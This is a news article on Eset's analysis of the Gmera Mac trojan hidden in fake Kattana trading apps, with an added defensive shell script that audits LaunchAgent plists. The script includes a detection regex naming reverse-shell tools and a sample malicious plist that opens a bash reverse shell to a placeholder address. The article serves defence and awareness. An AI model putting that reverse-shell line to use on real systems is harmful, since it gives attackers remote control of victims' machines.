New Mac Trojan empties cryptocurrency wallets

It impersonates legitimate trading apps such as Kattana. Eset has analyzed four different malicious trading apps. They install the Gmera malware, which in turn steals data, including credentials for crypto wallets.

Users who trade cryptocurrencies on their Apple computers should protect themselves against new Mac malware. According to Eset, malware is currently circulating that poses as a legitimate version of cryptocurrency trading apps. Among others, software from the provider Kattana is affected.

The researchers do not know exactly how the trojanized versions of these apps end up on a Mac. They assume, however, that social engineering plays a role, especially since Kattana has been warning about malicious copies of its software since March. "The most plausible assumption is that operators contact their target people directly and manipulate them socially to install the malicious application," the researchers said.

So far, four malicious versions of the legitimate Kattana app have been found, distributed under the names Cointrazer, Cupatrade, Licatrade and Trezarus. Alongside the trading functions, they also bundle the Gmera malware installer, which, according to Trend Micro, was already bundled with another Mac trading app, Stockfolio, in 2019.

If the malicious app is run, Gmera establishes an HTTP connection to a command-and-control server on the Internet and opens a remote terminal session (a reverse shell) to another command server at a hard-coded IP address. These actions are started by a shell script, which also installs a launch agent so that the malware is re-launched at login and stays persistent.

At least in the Licatrade app examined by Eset, the launch agent did not work. In the other three variants, which are said to differ only slightly, the launch agent works as intended.
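One check a practitioner would run against the persistence mechanism just described, as an added example that is not code from Eset's report or from the malware itself: a POSIX shell audit of per-user LaunchAgent plists for reverse-shell style program arguments. The indicator regex, the com.example.* labels, the sample plists and the 203.0.113.10 address are all constructed for illustration and are not taken from the Gmera samples.

```shell
#!/bin/sh
# Added example (not ESET's analysis code and not the malware): audit a
# directory of LaunchAgent plists for the shape of persistence described
# above, a launch agent whose ProgramArguments spawn a reverse shell.
# The indicator regex, sample plists, labels and the 203.0.113.10 address
# are constructed for illustration.

# Command fragments that have no business in a LaunchAgent (ERE for grep -E).
SUSPICIOUS='/dev/(tcp|udp)/|(^|[ /])(nc|ncat|netcat) |(^|[ /])(ba|z)?sh -i|curl [^<]*[|] *(ba|z)?sh|base64 +(-d|--decode)|python[0-9.]* -c .*socket'

# scan_launch_agents DIR
# Prints the path of every *.plist in DIR whose <string> values match
# SUSPICIOUS, one path per line. Always returns 0; callers inspect the output.
scan_launch_agents() {
    dir=$1
    for f in "$dir"/*.plist; do
        [ -f "$f" ] || continue
        # Pull the text of every <string> element (ProgramArguments, Program,
        # Label ...). A line-based sed is enough for the flat plists launchd
        # reads; a production tool would use plutil or a real XML parser.
        if sed -n 's/.*<string>\(.*\)<\/string>.*/\1/p' "$f" | grep -qE "$SUSPICIOUS"; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# make_samples
# Creates a temporary directory holding two constructed plists, one benign and
# one malicious, and prints its path. Hypothetical labels, not real software.
make_samples() {
    d=$(mktemp -d)
    cat > "$d/com.example.updater.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
    # The malicious agent runs a reverse shell to a placeholder (TEST-NET-3)
    # address at every login; '&' and '>' are XML-escaped inside the plist.
    cat > "$d/com.example.helper.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>/bin/bash -i &gt;&amp; /dev/tcp/203.0.113.10/4444 0&gt;&amp;1</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
EOF
    printf '%s\n' "$d"
}

# Stand-alone demo: scan the constructed samples, then clean up.
samples=$(make_samples)
echo "Suspicious launch agents in $samples:"
scan_launch_agents "$samples"
rm -rf "$samples"
# On a Mac, audit the real per-user agents with:
#   scan_launch_agents "$HOME/Library/LaunchAgents"
```

The scan is deliberately pattern-based: a launch agent is legitimate infrastructure, so the signal is not its existence but what it executes. Pair it with a check of `/Library/LaunchAgents` and `/Library/LaunchDaemons`, and treat any agent whose program lives inside an app bundle you did not install as worth a closer look.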

The researchers also found most of the legitimate functions of the Kattana app in the malicious versions. Above all, the registration function, which links a wallet, and the actual trading function are available. The criminals in turn use these to get at their victims' wallets.

According to Eset, Gmera can also collect information about the infected system and tries to detect whether it is running in a honeypot. If macOS Catalina is installed, the malware's screenshot function is not activated: Catalina asks for the user's consent before an application may capture the screen, and that prompt would expose the malware.

Only then does the actual data theft begin. Besides login data for cryptocurrency exchanges, the attackers also exfiltrate browser data and cookies.

According to Eset, the operators also signed their malware with a valid Apple developer certificate, which has since been revoked. "In the case of Cointrazer, there were only 15 minutes between the time the Apple certificate was issued and the signing of the Trojan by the attackers," the researchers added. "This, and the fact that we didn't find anything else that was signed with the same key, suggests they got the certificate explicitly for that purpose."
